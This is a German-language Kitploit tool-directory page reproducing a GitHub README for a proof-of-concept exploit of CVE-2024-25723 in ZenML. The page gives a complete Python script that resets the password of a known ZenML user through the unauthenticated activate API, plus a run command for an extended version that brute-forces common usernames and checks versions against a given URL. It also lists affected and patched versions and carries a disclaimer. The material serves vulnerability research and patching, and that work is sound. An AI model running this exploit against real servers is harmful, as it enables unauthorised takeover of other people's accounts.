Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-CVE-2024-25723 — Lehrreicher Proof-of-Concept-Exploit für CVE-2024-25723, der die unbefugte Kontoübernahme in ZenML über eine API-Passwortzurücksetzung demonstriert, mit Versionserkennung und Brute-Force-Benutzernamensermittlung. | Kitploit
Tools/GitHubGitHub/david-botelho-mariano/exploit-cve-2024-25723
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdavid-botelho-mariano/exploit-cve-2024-25723

exploit-CVE-2024-25723

Lehrreicher Proof-of-Concept-Exploit für CVE-2024-25723, der die unbefugte Kontoübernahme in ZenML über eine API-Passwortzurücksetzung demonstriert, mit Versionserkennung und Brute-Force-Benutzernamensermittlung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
42vor 2 JahrenNoch nicht geprüft

Exploit für CVE-2024-25723

Dieses Repository widmet sich der Behandlung von CVE-2024-25723, einer kritischen Sicherheitslücke in ZenML, und enthält einen bildungstechnischen Proof of Concept (PoC), um das Problem zu veranschaulichen und eine schnelle Behebung zu fördern. Der PoC zeigt, wie ein unbefugter Benutzer die Schwachstelle potenziell ausnutzen könnte, um die Kontrolle über beliebige ZenML-Konten zu übernehmen.

Proof of Concept (PoC)

  1. Starten Sie den ZenML-Server über Docker.

docker run -it -d -p 8080:8080 --name zenml zenmldocker/zenml-server:0.46.0

  1. Speichern Sie den folgenden Code als "exploit-CVE-2024-25723.py" und führen Sie dann "python exploit-CVE-2024-25723.py" aus.
root@kitploit:~
import requests

base_url = "http://localhost:8080"
user = "default"
new_password = "3gx9AbzP92rfHhZ"

activate_api_url = f"{base_url}/api/v1/users/{user}/activate"
activate_api_headers = {"Content-Type": "application/json"}
activate_api_json={"password": new_password}
activate_api_response = requests.put(activate_api_url, headers=activate_api_headers, json=activate_api_json)
print(activate_api_response.json())
  1. Wenn der Standardbenutzer namens "default" registriert ist und ZenML in einer angreifbaren Version läuft, wird der Exploit erfolgreich ausgeführt und das neue Passwort für dieses Konto lautet: "3gx9AbzP92rfHhZ" (damit der Exploit funktioniert, muss der Name des Zielbenutzers bekannt sein).

Erweiterter Exploit

Der Unterschied zwischen PoC und dem erweiterten Exploit besteht darin, dass der erweiterte Exploit die am häufigsten verwendeten Benutzernamen per Brute-Force ermittelt und außerdem durch eine API, die die ZenML-Version preisgibt, erkennen kann, ob die Version anfällig ist oder nicht. Um den erweiterten Exploit zu verwenden, speichern Sie den folgenden Code in einer Datei:

https://github.com/david-botelho-mariano/exploit-CVE-2024-25723/blob/main/advanced-exploit-CVE-2024-25723.py

Der Befehl zum Ausführen dieses Exploits lautet:

python3 advanced-exploit-CVE-2024-25723.py https://example.com

Betroffene Versionen:

Alle ZenML-Versionen unter 0.46.7 sind anfällig, mit Ausnahme der folgenden Patch-Versionen: (0.44.4, 0.43.1, 0.42.2).

Sofortiges Handeln erforderlich:

Führen Sie ein Upgrade auf die neueste Version (0.46.7 oder höher) oder eine der gepatchten Versionen (0.44.4, 0.43.1, 0.42.2) durch, um dieses Risiko zu mindern.

Haftungsausschluss

Der in diesem Repository bereitgestellte Proof of Concept (PoC) dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die Informationen und der Code sind für Cybersicherheitsexperten und Forscher bestimmt, um Schwachstellen in Software und Systemen zu verstehen und sich davor zu schützen. Jegliche Verwendung dieses PoC, der zugehörigen Informationen oder des Codes zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal und strengstens untersagt.

Durch die Verwendung dieses PoC erklären Sie sich damit einverstanden, dass Sie die potenziellen Auswirkungen der demonstrierten Sicherheitslücke verstehen und dass Sie sie verantwortungsvoll und ethisch nutzen werden. Die Autoren dieses PoC lehnen jegliche Haftung für Missbrauch dieses Materials oder Schäden ab, die durch die Verwendung der bereitgestellten Informationen und des Codes entstehen können. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen, nationalen und internationalen Gesetze einzuhalten.

Die Autoren haben alle Anstrengungen unternommen, um die Richtigkeit und Zuverlässigkeit der in diesem Repository bereitgestellten Informationen zu gewährleisten. Die Informationen werden jedoch "wie besehen" ohne jegliche Gewährleistung bereitgestellt. Die Autoren übernehmen keine Verantwortung oder Haftung für die Richtigkeit, Vollständigkeit, Rechtmäßigkeit oder Zuverlässigkeit der enthaltenen Informationen.

Tool herunterladen